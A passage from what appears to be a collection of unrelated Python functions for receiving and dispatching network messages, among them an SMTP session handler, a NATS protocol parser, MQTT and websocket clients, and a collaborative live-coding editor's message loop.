self.request.recv(self.data_recv_size)\n else:\n data = self.request.recv(self.std_recv_size)\n if sent != 5:\n self.command_w_th_inc.write_commands(\n data=bytes(data).decode().encode('ascii', 'ignore')\n .decode().rstrip(), qid=self.message_id)\n # To many empty line received, closed thread\n if self.func_empty_check(data):\n if empty_check >= 3:\n break\n else:\n empty_check += 1\n continue\n # Logging session requests if steps not equal to data section\n if sent != 5:\n log_th.log_info('{} - {} client executed : \"{}\"'.format(\n self.message_id, self.client_ip, bytes(data).decode().rstrip()))\n # Break the loop\n if self.func_quit(data):\n break\n except Exception as ae:\n log_th.log_warning('{} encounter an error from {} thread : {}'.format(\n self.client_ip, threading.current_thread().name, str(ae)))\n break\n else:\n try:\n # Checking the all steps\n if self.func_rset(data):\n sent = 2\n continue\n if self.func_auth(data):\n continue\n if self.func_auth_plain(data):\n continue\n if self.func_starttls(data):\n continue\n # Starting the sent steps\n # Ehlo/hello\n if sent == 1:\n if self.func_ehlo(data) or self.func_helo(data):\n sent += 1\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('command not found'))\n # Mail from, rcpt to, data\n elif sent == 2:\n if bytes(data).decode().encode('ascii', 'ignore').decode().rstrip().splitlines().__len__() > 2:\n get_data = False\n get_recv = False\n elif bytes(data).decode().encode('ascii',\n 'ignore').decode().rstrip().splitlines().__len__() > 1:\n get_recv = False\n if self.func_from(data, get_recv):\n sent += 1\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('mail from'))\n if not get_recv:\n if self.func_to(data, get_recv, get_data):\n sent += 1\n get_recv = True\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('rcpt to'))\n if not get_data:\n if self.func_data(data, get_recv, get_data):\n sent += 1\n get_data = True\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('data'))\n # rcpt to and data\n elif sent == 3:\n if bytes(data).decode().encode('ascii', 'ignore').decode().rstrip().splitlines().__len__() > 1:\n get_data = False\n if self.func_to(data, get_recv, get_data):\n sent += 1\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('rcpt to'))\n if not get_data:\n if self.func_data(data, get_recv, get_data):\n sent += 1\n get_data = True\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('data'))\n # data\n elif sent == 4:\n if self.func_to(data, get_recv, get_data):\n continue\n if self.func_data(data, get_recv, get_data):\n sent += 1\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('data'))\n # content writing to file (if enabled) and quit statement\n elif sent == 5:\n data_list = bytes(data).decode().split('\\r\\n')\n for line in data_list:\n if str(line) == '.':\n if self.mail_save_enable != 0:\n out_file = open(self.mail_save_path + '/'\n + self.message_id + '.eml', 'w')\n out_file.write(msg_body)\n out_file.close()\n self.func_data_ok()\n sent = 1\n break\n else:\n msg_body += str(line) + '\\r\\n'\n except IndexError:\n if sent == 2:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('mail from'))\n elif sent == 3:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('rcpt to'))", "def run(self):\n while True:\n msg = self.recv()", "def post(self):\n try:\n msg = json.loads(self.request.body)\n command = msg[\"command\"]\n # start/stop data_worker\n if command == \"start\":\n message = self.start_data_worker()\n self.write({\"success\": True, \"message\": message})\n elif command == \"stop\":\n message = self.stop_data_worker()\n self.write({\"success\": True, \"message\": message})\n else:\n self.write({\"success\": False, \"message\": \"unknown command\"})\n except Exception:\n log.exception(\"Exception\")\n self.write({\"success\": False, \"message\": \"error during control\"})", "def handle_client(self):\n e = threading.Event()\n reg_t = threading.Thread(target=self.handle_reg_client, args=(e,))\n stream_t = threading.Thread(target=self.handle_stream_client,\n args=(e,))\n reg_t.start()\n stream_t.start()", "def receive_data(self):\n self.new_socket.listen(5)\n while True:\n channel, address = self.new_socket.accept()\n if self.clients_count < 5:\n Thread(target=self.listen_clients, args=(channel, address)).start()\n self.clients_count += 1\n print(\"No. of clients connected:\" + str(self.clients_count))\n else:\n print(\"No new threads allowed\")\n break", "def raw_readline(self):\n while True:\n # Check if the channel contains data.\n logger.debug(\"Preparing to read line from %s ..\", self.conn_label)\n data = self.conn_handle.readline()\n if data:\n break\n # If the readline() above returns an empty string the channel\n # is (probably) not connected. At this point we'll bother to\n # prepare a convoluted way to block until the channel does\n # become connected.\n logger.debug(\"Got an empty read, emulating blocking read of %s ..\", self.conn_label)\n # Set the O_ASYNC flag on the file descriptor connected to the\n # character device (this is required to use SIGIO signals).\n flags = fcntl.fcntl(self.conn_handle, fcntl.F_GETFL)\n fcntl.fcntl(self.conn_handle, fcntl.F_SETFL, flags | os.O_ASYNC)\n # Spawn a subprocess to reliably handle SIGIO signals. Due to the\n # nature of (SIGIO) signals more than one signal may be delivered\n # and this is a big problem when you want to do more than just call\n # sys.exit(). The alternative to this would be signal.pause() but\n # that function has an inherent race condition. To fix that race\n # condition there is sigsuspend() but this function is not\n # available in the Python standard library.\n waiter = WaitForRead()\n # If we get killed we need to make sure we take the subprocess\n # down with us, otherwise the subprocess may still be reading\n # from the character device when we are restarted and that's a\n # problem because the character device doesn't allow multiple\n # readers; all but the first reader will get the error\n # `IOError: [Errno 16] Device or resource busy'.\n with GracefulShutdown():\n try:\n # Start the subprocess.\n waiter.start()\n # Connect the file descriptor to the subprocess.\n fcntl.fcntl(self.conn_handle, fcntl.F_SETOWN, waiter.pid)\n # The channel may have become connected after we last got an empty\n # read but before we spawned our subprocess, so check one more\n # time to make sure.\n data = self.conn_handle.readline()\n if data:\n break\n # If there is still no data available we'll wait for the\n # subprocess to indicate that data has become available.\n waiter.join()\n # Let's see if the subprocess is right :-)\n data = self.conn_handle.readline()\n if data:\n break\n finally:\n logger.debug(\"Terminating subprocess with process id %i ..\", waiter.pid)\n waiter.terminate()\n # If the convoluted way to simulate blocking reads above ever\n # fails we don't want this method to turn into a `busy loop'.\n logger.debug(\"Blocking read emulation seems to have failed, falling back to 1 second polling interval ..\")\n time.sleep(1)\n logger.debug(\"Read %i bytes from %s: %r\", len(data), self.conn_label, data)\n return data", "def handle(self):\n thread_name = get_threadname()\n\n style_args = {}\n style_args['label'] = thread_name\n\n axis_args = {}\n axis_args['name'] = 'default'\n axis_args['x_label'] = ''\n axis_args['y_label'] = ''\n\n # client_init blocks until client sends 'BEGIN'\n first_value = self._handle_client_init(style_args, axis_args)\n if type(first_value) != float:\n if first_value == \"RETURN\":\n # done with client\n return\n else:\n print \"Unknown status\"\n return\n\n self._handle_setup_axis(axis_args)\n\n print \"Assigning to axis:\", axis_args['name']\n axes = self.server.axes[axis_args['name']]\n line_name = self._handle_create_line(axes, style_args)\n self._handle_update_legend(axes)\n\n # NOTE: client_read_data will block until client disconnects.\n self._handle_client_read_data(first_value, line_name)\n print \"Exiting:\", thread_name", "def run(self):\n watcher = self._watcher(self.on_recv)\n watcher.loop()", "def _run(self) -> None:\n\n log.debug(\"Volumio 2 Web Service client starting ...\")\n log.debug(f\"Connecting to Volumio 2 Web Service on {self._server}:{self._port}\")\n\n with SocketIO(self._server, self._port) as socketIO:\n log.debug(\"Connected to Volumio 2 Web Service\")\n socketIO.on(\"pushState\", self._on_state_response)\n socketIO.emit(\"GetState\", on_GetState_response)\n\n # Request initial values\n socketIO.emit(\"getState\", \"\")\n\n while not self._stop_event.is_set():\n # rely on Volumio to push states mostly, but request an update\n # at a low frequency to get some lacy update.\n socketIO.wait_for_callbacks(seconds=10)\n socketIO.emit(\"getState\", \"\")", "def _process(self):\n\n while True:\n try:\n sockets = [self.master_fd]\n if self.sock:\n sockets.append(self.sock)\n # Don't handle user input while a side command is running.\n if len(self.filter) == 1:\n sockets.append(pty.STDIN_FILENO)\n rfds, _, _ = select.select(sockets, [], [], 0.25)\n except select.error as ex:\n if ex[0] == errno.EAGAIN: # Interrupted system call.\n continue\n raise\n\n if not rfds:\n self._timeout()\n else:\n # Handle one packet at a time to mitigate the side channel\n # breaking into user input.\n if self.master_fd in rfds:\n data = os.read(self.master_fd, 1024)\n self.master_read(data)\n elif pty.STDIN_FILENO in rfds:\n data = os.read(pty.STDIN_FILENO, 1024)\n self.stdin_read(data)\n elif self.sock in rfds:\n data, self.last_addr = self.sock.recvfrom(65536)\n if data[-1] == b'\\n':\n self.log(\"WARNING: the command ending with <nl>. \"\n \"The StreamProxy filter known to fail.\")\n self.log(\"Got command '%s'\" % data.decode('utf-8'))\n command = self.filter_command(data)\n self.log(\"Translated command '{}'\"\n .format(command.decode('utf-8')))\n if command:\n self.write_master(command)\n self.write_master(b'\\n')", "def dataReceived(self, data):\n startTime = time.time()\n reqid = \"unknown%i\" % startTime\n\n def checkDeferred(data, _host):\n parsedData = self.__parseData(data)\n if parsedData != None:\n if not parsedData.has_key('resource_start_time'):\n parsedData['resource_start_time'] = startTime\n reqid = parsedData.get('instance', \"unknown%i\" % startTime)\n logging.getLogger().info(\"%s start[%i]\" % (reqid, startTime))\n if logging.getLogger().getEffectiveLevel() < logging.DEBUG:\n rusage = list(resource.getrusage(resource.RUSAGE_SELF))\n rusageStr = \"[ %.3f, %.3f, %s ]\" % (rusage[0], rusage[1], str(rusage[2:])[1:-1])\n logging.getLogger().debug(\"%s gc(%s, %s), rs%s\" % (reqid, len(gc.get_objects()), len(gc.garbage), rusageStr))\n\n action, actionEx = self.check(self.factory, parsedData, _host)\n\n runTime = int((time.time() - startTime) * 1000)\n logging.getLogger().info(\"%s finish[%i]: %s (%s)\" % (reqid, runTime, action, actionEx))\n if logging.getLogger().getEffectiveLevel() < logging.DEBUG:\n rusage = list(resource.getrusage(resource.RUSAGE_SELF))\n rusageStr = \"[ %.3f, %.3f, %s ]\" % (rusage[0], rusage[1], str(rusage[2:])[1:-1])\n logging.getLogger().debug(\"%s gc(%s, %s), rs%s\" % (reqid, len(gc.get_objects()), len(gc.garbage), rusageStr))\n\n return action, actionEx\n else:\n # default return action for garbage?\n return None, None\n\n def checkDeferredCallback(data):\n self.dataResponse(data[0], data[1])\n\n def checkDeferredErrback(err):\n logging.getLogger().error(\"%s uncatched exception for connection id %s: %s\" % (reqid, self.numProtocolsId, err.getErrorMessage()))\n logging.getLogger().error(str(err.getTraceback()))\n self.dataResponse(self.returnOnFatalError[0], self.returnOnFatalError[1])\n\n # handle data in new thread and return results using deferred\n d = threads.deferToThread(checkDeferred, data, self.transport.getHost())\n d.addCallback(checkDeferredCallback)\n d.addErrback(checkDeferredErrback)", "def on_message(self, client, userdata, msg):\n\n data = json.loads(msg.payload.decode(\"utf-8\"))\n if debug: print(\"topic: \", msg.topic, \" payload:\", data)\n #print \"Received: \", data\n if msg.topic == self.subControls:\n self.controller.setpoint = int(data['temp'])\n status_old = self.controller.status\n if data['mode'] == \"auto\" or data['mode'] == \"cool1\" or data['mode'] == \"cool2\" or data['mode'] == \"cool3\":\n self.controller.status = 1\n elif data['mode'] == \"off\":\n self.controller.status = 0\n if status_old and self.controller.status: onoff = False\n elif status_old and not self.controller.status: onoff = True\n elif not status_old and self.controller.status: onoff = True\n else: onoff = False\n self.controller.updateControls(onoff = onoff, radio=False)\n\n elif msg.topic == self.subSettings :\n self.controller.temp_interval = int(data['temp-res'])\n self.controller.energy_interval = int(data['energy-res'])\n self.controller.updateIntervals()\n else:\n pass", "def recvData(self):\n prec_state = self.status\n self.status = Modem.Status.BUSY2RECV\n data = self.conn.recvData()\n self.status = prec_state\n self.checkConnection(data)\n return data", "async def receiver(self):\n socket_input = await self.websocket.recv()\n logger.debug(\"<<< Received:\\n{}\".format(socket_input))\n\n # Showdown sends this response on initial connection\n if socket_input == \"o\":\n logger.info(\"Connected on {}\".format(self.websocket_url))\n self.connected = True\n self.add_task(self.on_connect())\n return\n\n inputs = utils.parse_socket_input(socket_input)\n for room_id, inp in inputs:\n room_id = room_id or \"lobby\"\n logger.debug(\"||| Parsing:\\n{}\".format(inp))\n inp_type, params = utils.parse_text_input(inp)\n\n # Set challstr attributes and autologin\n if inp_type == \"challstr\":\n self.challengekeyid, self.challstr = params\n if self.name and self.password and self.autologin:\n await self.login()\n elif self.autologin:\n msg = (\n \"Cannot login without username and password. If \"\n \"you don't want your client to be logged in, \"\n \"you can use Client.start(autologin=False).\"\n )\n raise Exception(msg)\n\n # Process query response\n elif inp_type == \"queryresponse\":\n response_type, data = params[0], \"|\".join(params[1:])\n data = json.loads(data)\n self.add_task(\n self.on_query_response(response_type, data), transient=True\n )\n if response_type == \"savereplay\":\n self.add_task(\n self.server.save_replay_async(data), transient=True\n )\n\n # Challenge updates\n elif inp_type == \"updatechallenges\":\n self.challenges = json.loads(params[0])\n self.add_task(\n self.on_challenge_update(self.challenges), transient=True\n )\n\n # Messages\n elif inp_type == \"c:\" or inp_type == \"c\":\n timestamp = None\n if inp_type == \"c:\":\n timestamp, params = int(params[0]), params[1:]\n author_str, *content = params\n content = \"|\".join(content)\n chat_message = message.ChatMessage(\n room_id, timestamp, author_str, content, client=self\n )\n self.add_task(\n self.on_chat_message(chat_message), transient=True\n )\n elif inp_type == \"pm\":\n author_str, recipient_str, *content = params\n content = \"|\".join(content)\n private_message = message.PrivateMessage(\n author_str, recipient_str, content, client=self\n )\n self.add_task(\n self.on_private_message(private_message), transient=True\n )\n\n # Rooms\n elif inp_type == \"init\":\n room_type = params[0]\n room_obj = room.class_map.get(room_type, room.Room)(\n room_id, client=self, max_logs=self.max_room_logs\n )\n self.rooms[room_id] = room_obj\n self.add_task(self.on_room_init(room_obj), transient=True)\n elif inp_type == \"deinit\":\n if room_id in self.rooms:\n self.add_task(\n self.on_room_deinit(self.rooms.pop(room_id)),\n transient=True,\n )\n\n # add content to proper room\n if isinstance(self.rooms.get(room_id, None), room.Room):\n self.rooms[room_id].add_content(inp)\n\n self.add_task(\n self.on_receive(room_id, inp_type, params), transient=True\n )", "def run(self):\n self.display_messages.emit((\"Starting connection...\", \"blue\"))\n\n # Opening server process\n self.server_process = Popen([\"roslaunch\", \"crazyflie_driver\", \"crazyflie_server.launch\"], stdout=PIPE)\n\n self.display_messages.emit((\"Server online\", \"darkgreen\"))\n\n # Update crazyflies status to connecting\n for drone in self.available_drones:\n self.update_crazyflie_status.emit((drone, \"connecting...\", \"blue\"))\n\n # Opening communications with drones\n for drone in self.available_drones:\n self.cf_process = Popen([\"roslaunch\", \"psc\", \"run_real.launch\",\n \"cf:=\" + str(drone), \"radio_id:=\" + self.available_drones[drone]],\n stdout=PIPE, stderr=PIPE)\n\n start_time = time.time()\n while self.cf_process.poll() is None and time.time() < start_time+TIMEOUT:\n output, err = self.cf_process.communicate()\n err = str(err)\n if len(err) > 0:\n # Treating no USB device error\n if err.find(\"No matching USB Device\") >= 0:\n self.display_messages.emit((\"USB radio not detected\", \"red\"))\n time.sleep(NO_USB_DELAY)\n self.working = False\n self.stop()\n return\n\n # Treat timeout error\n if time.time() > start_time+TIMEOUT:\n self.update_crazyflie_status.emit((drone, \"connection timeout\", \"red\"))\n continue\n\n # Showing successful connection message\n self.update_crazyflie_status.emit((drone, \"online\", \"green\"))\n\n # Updating working status\n self.working = False", "def parse(self, data=''):\n self.scratch += data\n for i in self.scratch:\n if self.state == AWAITING_CONTROL_LINE:\n\n # MSG\n if self.scratch.startswith(MSG_OP):\n self.state = AWAITING_MSG_ARG\n\n # OK\n elif self.scratch.startswith(OK):\n # No op. But still consume OK from buffer and set next state.\n if len(self.scratch) > OK_SIZE:\n self.scratch = self.scratch[OK_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n # -ERR\n elif self.scratch.startswith(ERR_OP):\n self.state = AWAITING_MINUS_ERR_ARG\n\n # PONG\n elif self.scratch.startswith(PONG):\n self.nc._process_pong()\n\n if len(self.scratch) > PONG_SIZE:\n self.scratch = self.scratch[PONG_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n # PING\n elif self.scratch.startswith(PING):\n self.nc.send_command(PONG)\n if len(self.scratch) > PING_SIZE:\n self.scratch = self.scratch[PING_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n elif self.state == AWAITING_MSG_ARG:\n i = self.scratch.find(_CRLF_)\n if i > 0:\n line = self.scratch[:i]\n args = line.split(_SPC_)\n\n # Check in case of using a queue\n args_size = len(args)\n if args_size == 5:\n self.msg_arg[\"subject\"] = args[1]\n self.msg_arg[\"sid\"] = int(args[2])\n self.msg_arg[\"reply\"] = args[3]\n self.needed = int(args[4])\n elif args_size == 4:\n self.msg_arg[\"subject\"] = args[1]\n self.msg_arg[\"sid\"] = int(args[2])\n self.msg_arg[\"reply\"] = \"\"\n self.needed = int(args[3])\n else:\n raise ErrProtocol(\"Wrong number of arguments in MSG\")\n self.scratch = self.scratch[i+CRLF_SIZE:]\n self.state = AWAITING_MSG_PAYLOAD\n\n elif self.state == AWAITING_MSG_PAYLOAD:\n if len(self.scratch) >= self.needed:\n payload = self.scratch[:self.needed]\n subject = self.msg_arg[\"subject\"]\n sid = self.msg_arg[\"sid\"]\n reply = self.msg_arg[\"reply\"]\n\n # Set next stage already before dispatching to callback\n self.scratch = self.scratch[self.needed:]\n self.state = AWAITING_MSG_END\n\n msg = Msg(subject=subject, sid=sid, reply=reply, data=payload)\n self.nc._process_msg(msg)\n\n elif self.state == AWAITING_MSG_END:\n i = self.scratch.find(MSG_END)\n if i > 0:\n self.scratch = self.scratch[i+1:]\n self.state = AWAITING_CONTROL_LINE\n\n # -ERR 'error'\n elif self.state == AWAITING_MINUS_ERR_ARG:\n i = self.scratch.find(_CRLF_)\n if i > 0:\n line = self.scratch[:i]\n _, err = line.split(_SPC_, 1)\n self.nc._process_err(err)\n if len(self.scratch) > i+CRLF_SIZE:\n self.scratch = self.scratch[i+CRLF_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE", "def reader(self, stop_event):\n while not stop_event.is_set():\n data, addr = self.sock.recvfrom(SRPCDef.FRAGMENT_SIZE * 10)\n if len(data) == 0:\n break\n payload = Payload(buffer=data)\n endpoint = Endpoint(addr[0], addr[1], payload.subport)\n connection = self.connectionTable.get(endpoint)\n\n if connection is not None: #Found a valid connection record\n connection.commandReceived(payload)\n elif payload.command == Command.CONNECT:\n payload = ConnectPayload(buffer=data)\n service = self.serviceTable.get(payload.serviceName)\n \n if service is not None:\n connection = Connection(self.sock, endpoint, service)\n self.connectionTable[endpoint] = connection\n connection.commandReceived(payload)\n #else: invalid connection + command request", "def run(self):\n self._log.info(\"Running\")\n self._running.set()\n\n if not self._dev:\n self._sock.connect((self._host_ip, self._host_port))\n\n self._connected.set()\n\n # select on the socket until we're told not to run anymore\n while self._running.is_set():\n if not self._dev:\n reads, _, _ = select.select([self._sock], [], [], 0.1)\n if len(reads) > 0:\n data = \"\"\n with self._send_recv_lock:\n while True:\n recvd = self._sock.recv(0x1000)\n if len(recvd) == 0:\n break\n data += recvd\n self._recv_callback(data)\n time.sleep(0.1)\n\n self._log.info(\"Finished\")", "def dataReceived (self, data) :\r\n \r\n buf = buffer.Buffer(self.recvbuffer + data)\r\n \r\n # process packets until there are no more of them\r\n\r\n try :\r\n buf.processWith(self.processPacket)\r\n except BaseClientAbort, e :\r\n self.do_abort(e.errorCode())\r\n \r\n self.log(\"closing connection\")\r\n self.transport.loseConnection()\r\n \r\n except BaseClientError, e :\r\n self.do_error(e.errorCode())\r\n \r\n except Exception, e :\r\n self.log(\"unknown exception %s: %s\" % (type(e), e))\r\n \r\n self.log(\"closing connection\")\r\n self.transport.loseConnection()\r\n \r\n raise\r\n \r\n # stuff remaining data back into recvbuf\r\n self.recvbuffer = buf.read()", "def run(self):\r\n while not self.shutdown_flag:\r\n try:\r\n # wait for connection\r\n if len(self.conns) == 0:\r\n self._wait()\r\n\r\n # receive message\r\n conn, (command, args) = self.recv()\r\n\r\n # process according to request\r\n if command == 'update_policy_network':\r\n self.agent.update_policy_network()\r\n elif command == 'get_action':\r\n action = self.agent.get_action(**args)\r\n self.send(conn, action)\r\n elif command == 'memorize':\r\n self.agent.memorize(**args)\r\n elif command == 'save_model':\r\n self.agent.save_model(**args)\r\n elif command == 'load_model':\r\n self.agent.load_model(**args)\r\n elif command == 'save_memory':\r\n self.agent.save_memory(**args)\r\n elif command == 'load_memory':\r\n self.agent.load_memory(**args)\r\n elif command == 'update_target_network':\r\n self.agent.update_target_network()\r\n elif command == 'detach':\r\n self.disconnect(conn)\r\n elif command == 'shutdown':\r\n self.shutdown_flag = True\r\n else:\r\n print('unknown command: {}'.format(command))\r\n except KeyboardInterrupt:\r\n print('interrupted')\r\n self.shutdown_flag = True\r\n break", "def handle(self):\r\n # self.request is the TCP socket connected to the client\r\n # read the incoming command\r\n request = self.request.recv(1024).strip()\r\n # write to the queue waiting to be processed by the server\r\n INPUT_QUEUE.put(request)\r\n # wait for the server answer in the output queue\r\n response = OUTPUT_QUEUE.get(timeout=5.0)\r\n # send back the answer\r\n self.request.send(response)", "def callback_client_receive(data):\n data: GameStateModel = JSONSerializer.deserialize(data)\n logger.debug(f\"Client received {data.__class__.__name__} object from host.\")\n # print(f\"Client received {data.__class__.__name__} object from host.\")\n if isinstance(data, GameStateModel):\n GameStateModel.set_game(data)\n return\n if isinstance(data, TurnEvent) or isinstance(data, ActionEvent):\n exec_thread = threading.Thread(target=data.execute)\n exec_thread.start()", "def handle(self):\n try:\n while True:\n\n # Pop the message from the queue\n\n msg = self.queue.get_nowait()\n\n # Log anything if necesary\n\n self.log_message(msg)\n\n # Identify the src peer\n\n if 'src_id' in msg:\n\n if msg['src_id'] == -1:\n\n this_peer = None # Server message\n\n else:\n\n this_peer = self.peers[msg['src_id']]\n\n # If we are not up-to-date with server, only accept MSG_CONNECT and MSG_SET_ALL\n\n if isinstance(msg, MSG_CONNECT):\n\n if self.marker.id != msg['src_id']:\n\n print(\"Peer '{}' has joined the session\".format(msg['name']))\n\n elif type(msg) == MSG_SET_ALL:\n\n # Set the contents of the text box\n\n self.handle_setall(msg['data'])\n\n # Move the peers to their position\n\n for _, peer in self.peers.items():\n \n peer.move(peer.row, peer.col)\n\n # self.mark_set(peer.mark, peer.index())\n\n # Format the lines\n\n self.format_text()\n\n # Move the local peer to the start\n\n self.marker.move(1,0)\n\n # Flag that we've been update\n\n self.is_up_to_date = True\n\n elif self.is_up_to_date:\n\n # If the server responds with a console message\n\n if isinstance(msg, MSG_RESPONSE):\n\n if hasattr(self.root, \"console\"):\n\n self.root.console.write(msg['string']) \n\n # Stop running when server is manually killed \n\n elif isinstance(msg, MSG_KILL):\n\n if hasattr(self.root, \"console\"):\n\n self.root.console.write(msg['string']) \n\n self.root.push.kill()\n self.root.pull.kill()\n\n # Handles selection changes\n\n elif isinstance(msg, MSG_SELECT):\n\n sel1 = str(msg['start'])\n sel2 = str(msg['end'])\n \n this_peer.select(sel1, sel2)\n\n # Handles keypresses\n\n elif isinstance(msg, MSG_DELETE):\n\n self.handle_delete(this_peer, msg['row'], msg['col'])\n\n self.root.colour_line(msg['row'])\n\n elif type(msg) == MSG_BACKSPACE:\n\n self.handle_backspace(this_peer, msg['row'], msg['col'])\n\n self.root.colour_line(msg['row'])\n\n elif isinstance(msg, MSG_EVALUATE_BLOCK):\n\n lines = (int(msg['start_line']), int(msg['end_line']))\n\n this_peer.highlightBlock(lines)\n\n # Experimental -- evaluate code based on highlight\n\n string = self.get(\"{}.0\".format(lines[0]), \"{}.end\".format(lines[1]))\n \n self.root.lang.evaluate(string, name=str(this_peer), colour=this_peer.bg)\n\n elif isinstance(msg, MSG_EVALUATE_STRING):\n\n # Handles single lines of code evaluation, e.g. \"Clock.stop()\", that\n # might be evaluated but not within the text\n\n self.root.lang.evaluate(msg['string'], name=str(this_peer), colour=this_peer.bg)\n\n elif isinstance(msg, MSG_SET_MARK):\n\n row = msg['row']\n col = msg['col']\n\n this_peer.move(row, col)\n\n # If this is a local peer, make sure we can see the marker\n\n if this_peer == self.marker:\n\n self.mark_set(INSERT, \"{}.{}\".format(row, col))\n\n self.see(self.marker.mark)\n\n elif isinstance(msg, MSG_INSERT):\n\n self.handle_insert(this_peer, msg['char'], msg['row'], msg['col'])\n\n # Update IDE keywords\n\n self.root.colour_line(msg['row'])\n\n # If the msg is from the local peer, make sure they see their text AND marker\n\n if this_peer == self.marker:\n\n self.see(self.marker.mark)\n\n self.edit_separator()\n\n elif isinstance(msg, MSG_GET_ALL):\n\n # Return the contents of the text box\n\n data = self.handle_getall()\n\n reply = MSG_SET_ALL(-1, data, msg['src_id'])\n\n self.root.push_queue.put( reply ) \n\n elif isinstance(msg, MSG_REMOVE):\n\n # Remove a Peer\n this_peer.remove()\n \n del self.peers[msg['src_id']]\n \n print(\"Peer '{}' has disconnected\".format(this_peer)) \n\n elif isinstance(msg, MSG_BRACKET):\n\n # Highlight brackets on local client only\n\n if this_peer.id == self.marker.id:\n\n row1, col1 = msg['row1'], msg['col1']\n row2, col2 = msg['row2'], msg['col2']\n\n peer_col = int(self.index(this_peer.mark).split(\".\")[1])\n\n # If the *actual* mark is a ahead, adjust\n\n col2 = col2 + (peer_col - col2) - 1\n\n self.tag_add(\"tag_open_brackets\", \"{}.{}\".format(row1, col1), \"{}.{}\".format(row1, col1 + 1))\n self.tag_add(\"tag_open_brackets\", \"{}.{}\".format(row2, col2), \"{}.{}\".format(row2, col2 + 1))\n\n elif type(msg) == MSG_CONSTRAINT:\n\n new_name = msg['name']\n\n print(\"Changing to constraint to '{}'\".format(new_name))\n\n for name in self.root.creative_constraints:\n\n if name == new_name:\n\n self.root.creative_constraints[name].set(True)\n self.root.__constraint__ = constraints[name](msg['src_id'])\n\n else:\n\n self.root.creative_constraints[name].set(False)\n\n elif type(msg) == MSG_SYNC:\n\n # Set the contents of the text box\n\n self.handle_setall(msg['data'])\n\n # Move the peers to their position\n\n for _, peer in self.peers.items():\n \n peer.move(peer.row, peer.col)\n\n # Format the lines\n\n self.format_text()\n\n elif type(msg) == MSG_UNDO:\n\n self.handle_undo()\n\n # Give some useful information about what the message looked like if error\n\n else:\n\n print(\"Error in text box handling. Message was {}\".format(msg.info()))\n\n raise e\n\n # Update any other idle tasks\n\n self.update_idletasks()\n\n # This is possible out of date - TODO check\n\n if msg == self.root.wait_msg:\n\n self.root.waiting = False\n self.root.wait_msg = None\n self.root.reset_title()\n\n self.refreshPeerLabels()\n\n # Break when the queue is empty\n except queue.Empty:\n \n self.refreshPeerLabels()\n\n # Recursive call\n self.after(30, self.handle)\n return", "def handle_connection(conn, addr, create):\r\n print 'connection recieved from:', addr\r\n server = create()\r\n server.startup()\r\n while True:\r\n data = conn.recv(1024) # read data from the connection / raw input\r\n if not data:\r\n break\r\n print 'from client:', data\r\n response = server.process(data)\r\n conn.send(response)\r\n server.finish()\r\n conn.close()", "def __run_client(self):\n\n self._client = CoapClient(server_hostname=self._hostname, server_port=self._port, src_port=self._src_port)\n self._client_running = True\n\n if self.use_polling:\n super(CoapSensor, self).on_start()\n else:\n self.observe_topic()", "def run(self):\n\n lastLevel = 0\n\n MSG_SIZ = 12\n\n while self.go:\n\n buf = self.sock.recv(MSG_SIZ)\n\n while self.go and len(buf) < MSG_SIZ:\n buf += self.sock.recv(MSG_SIZ-len(buf))\n\n if self.go:\n seq, flags, tick, level = (struct.unpack('HHII', buf))\n\n if flags == 0:\n changed = level ^ lastLevel\n lastLevel = level\n for cb in self.callbacks:\n if cb.bit & changed:\n newLevel = 0\n if cb.bit & level:\n newLevel = 1\n if (cb.edge ^ newLevel):\n cb.func(cb.gpio, newLevel, tick)\n else:\n gpio = flags & 31\n for cb in self.callbacks:\n if cb.gpio == gpio:\n cb.func(cb.gpio, TIMEOUT, tick)\n\n self.sock.close()", "def __receive_request(self):\n # get the request's length\n request_size = self.__socket.recv(Commands.SIZE_LENGTH)\n # if the master sent an empty msg, then he has closed himself\n if not request_size:\n print \"Master Has Been Closed\"\n # TODO: close the peasant and start the run function all over again\n return False\n # fix the request's length\n request_size = int(request_size) - Commands.COMMAND_LENGTH\n # get the request's command's number\n command = int(Commands.decrypt(self.__socket.recv(Commands.COMMAND_LENGTH)))\n # if the request size's is 0, then there are not args\n args = []\n # else, there are args, read them (decrypted)\n if request_size != 0:\n args = Commands.decrypt(self.__socket.recv(request_size)).split(Commands.SEPARATE_CHAR)\n if self.__DEBUG:\n print args\n # handle the command and add the command number and return value to the responses list\n self.__responses.append(str(command) + Commands.handle_command_request(command, args))\n return True", "def process_received_message(self, msg: str):\n all = msg.split(\":\")\n if len(all) < 2:\n self.log.warning(\"Recv bad formated cmd\", msg)\n return\n cmd, all_param = all[:2]\n params = all_param.split(\";\")\n\n self.strip.setPixelColorRGB(0, 0, 0, 0)\n if cmd == \"\":\n pass\n elif cmd == \"SWU\": # switch update\n sw_id = params[0]\n sw_state = int(params[1])\n self.machine.switch_controller.process_switch_by_num(sw_id, state=sw_state, platform=self, logical=False)\n self.strip.setPixelColorRGB(0, 0, 0, 0xff) # blue\n elif cmd == \"DBG\": # debug message\n self.log.debug(\"RECV:%s\" % msg)\n elif cmd == \"INF\": # debug message\n self.log.info(\"RECV:%s\" % msg)\n elif cmd == \"WRN\": # warning message\n self.log.warning(\"RECV:%s\" % msg)\n self.strip.setPixelColorRGB(0, 0xff, 0xff, 0) # yellow\n elif cmd == \"ERR\": # warning message\n self.log.error(\"RECV:%s\" % msg)\n self.strip.setPixelColorRGB(0, 0xff, 0, 0) # red\n elif cmd == \"TCK\": # arduino is alive !\n self.log.debug(\"TCK ok:%d\" % int(params[0]))\n elif cmd == \"ACK\": # ack of frame\n self.communicator.ack_frame(int(params[0]), params[1] == \"OK\")\n self.strip.setPixelColorRGB(0, 0, 0xff, 0) # green\n else:\n self.log.warning(\"RECV:UNKNOWN FRAME: [%s]\" % 